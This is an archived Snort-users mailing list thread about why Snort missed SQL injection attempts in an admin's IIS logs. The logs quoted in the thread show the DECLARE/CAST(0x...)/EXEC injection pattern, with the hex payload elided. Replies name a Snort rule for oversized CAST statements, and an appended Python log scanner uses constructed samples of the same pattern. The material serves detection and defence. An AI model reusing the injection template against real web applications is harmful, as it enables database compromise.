Re: [Snort-users] Undetected SQL Injection

Old 06-24-2008
Leon Ward
 

Hi, I assume Joel is referring to good old 1:13791.
SQL oversized cast statement - possible sql injection obfuscation

-Leon

On 24 Jun 2008, at 09:07, Patrik Nordlén wrote:

> Which rule is that?
>
> /Patrik
>
> On Monday 23 June 2008 22.18.25 Joel Esler wrote:
>> There is a rule that will catch these in the most recent SQL.rules
>> file.
>>
>> --
>> Joel Esler
>> Sent from my iPhone
>>
>> On Jun 23, 2008, at 3:15 PM, Curtis LaMasters <curtislamasters@gmail.com> wrote:
>>> I am running Snort 2.7 on my firewalls and have still somehow been
>>> SQL injected. I have the SQL rules, MySQL rules, IIS Rules, and a
>>> few more but it still did not detect. Below I have part of the IIS
>>> log where the injection (attempt) was done. I was hoping someone
>>> could shed some light on the problem. Please let me know if I need
>>> to provide any additional information.
>>>
>>> 2008-06-23 00:30:44 10.99.4.44 GET /com/store/content.asp
>>> ContentID=10;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
>>> (0x[...]%20AS%20VARCHAR(4000));EXEC(@S);--|21|800a0d5d|
>>> Application_uses_a_value_of_the_wrong_type_for_the_current_operation
>>> .
>>> 80 - 201.208.89.82 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT
>>> +5.1;+.NET+CLR+2.0.50727) 500 0 0
>>>
>>> 2008-06-23 01:23:24 10.99.4.44 GET /com/store/com_viewItem.asp
>>> idProduct=9;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
>>> (0x[...]%20AS%20VARCHAR(4000));EXEC(@S);-- 80 -
>>> 59.178.127.68
>>> Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR
>>> +2.0.50727)
>>> 302 0 0
>>>
>>> Curtis LaMasters
>>> http://www.curtis-lamasters.com
>>> http://www.builtnetworks.com



-------------------------------------------------------------------------
Check out the new SourceForge.net Marketplace.
It's the best place to buy or sell services for
just about anything Open Source.
http://sourceforge.net/services/buy/index.php
_______________________________________________
Snort-users mailing list
Snort-users@lists.sourceforge.net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/...fo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.p...st=snort-users
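
The pattern named in the reply above, an oversized CAST of a hex literal, can also be hunted for after the fact in the IIS logs themselves. The following Python is an added example, not from the thread and not the logic of rule 1:13791; the 64-digit threshold, the field positions (taken from the log layout quoted above) and the sample log lines are assumptions or constructed data.

```python
import re
from urllib.parse import unquote_plus

# Assumption: 64+ hex digits inside CAST() counts as "oversized" (threshold not from the thread).
MIN_HEX_DIGITS = 64
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9a-f]{%d,})\s+AS\s+N?(?:VAR)?CHAR" % MIN_HEX_DIGITS, re.I)

def decode_query(raw, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def scan_line(line):
    """Return a finding for one IIS log line, or None if it does not match."""
    fields = line.split()
    # Assumed layout: date time s-ip method uri-stem uri-query port user c-ip ...
    if line.startswith("#") or len(fields) < 9:
        return None
    match = CAST_HEX.search(decode_query(fields[5]))
    if not match:
        return None
    digits = match.group(1)
    # Decode the literal for triage; drop a trailing odd digit if present.
    hidden = bytes.fromhex(digits[: len(digits) // 2 * 2]).decode("latin-1")
    return {"time": " ".join(fields[:2]), "uri": fields[4], "client": fields[8],
            "hex_digits": len(digits), "decoded": hidden}

def scan_log(lines):
    return [finding for finding in map(scan_line, lines) if finding]

# Constructed sample data: a harmless statement and documentation IP ranges.
SAMPLE_SQL = "SELECT 'constructed benign sample, not a real payload' AS note"
SAMPLE_HEX = SAMPLE_SQL.encode().hex().upper()
TAIL = "%20AS%20VARCHAR(4000));EXEC(@S);--"
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip",
    "2008-06-23 00:30:01 192.0.2.10 GET /store/item.asp id=9 80 - 198.51.100.7 UA 200 0 0",
    "2008-06-23 00:30:02 192.0.2.10 GET /store/item.asp id=CAST(0x41%20AS%20CHAR(1)) 80 - 198.51.100.7 UA 200 0 0",
    "2008-06-23 00:30:44 192.0.2.10 GET /store/item.asp id=9;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX + TAIL + " 80 - 198.51.100.9 UA 500 0 0",
    "2008-06-23 00:31:10 192.0.2.10 GET /store/item.asp id=9;set%2520@s=cast(0x"
    + SAMPLE_HEX.lower() + TAIL.replace("%", "%25") + " 80 - 198.51.100.9 UA 500 0 0",
]
if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

The short `CAST(0x41 AS CHAR(1))` line is deliberately left unflagged, and the last sample line shows the same statement double-encoded and lower-cased still being caught once the query is normalised.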
